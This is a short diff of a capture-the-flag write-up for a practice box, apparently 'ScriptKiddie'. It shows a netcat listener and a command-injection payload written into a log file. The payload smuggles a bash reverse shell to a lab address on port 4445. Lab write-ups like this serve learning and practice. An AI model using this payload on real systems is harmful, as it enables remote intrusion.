prodseanb/ctf-writeups/ScriptKiddie/README.md

  ```
  $ nc -nvlp 4445
  ```
 Looking at the `scanlosers.sh` file in /home/pwn, the script is vulnerable to command injection.
-This payload contains a reverse shell that we can push to the log file `hackers`.
+This payload contains a reverse shell that we can push to the log file `hackers` in kid's home directory under `/home/kid/logs`.
  ```
 echo "x x x 127.0.0.1; bash -c 'bash -i >& /dev/tcp/10.10.14.3/4445 0>&1' # ." > hackers
  ```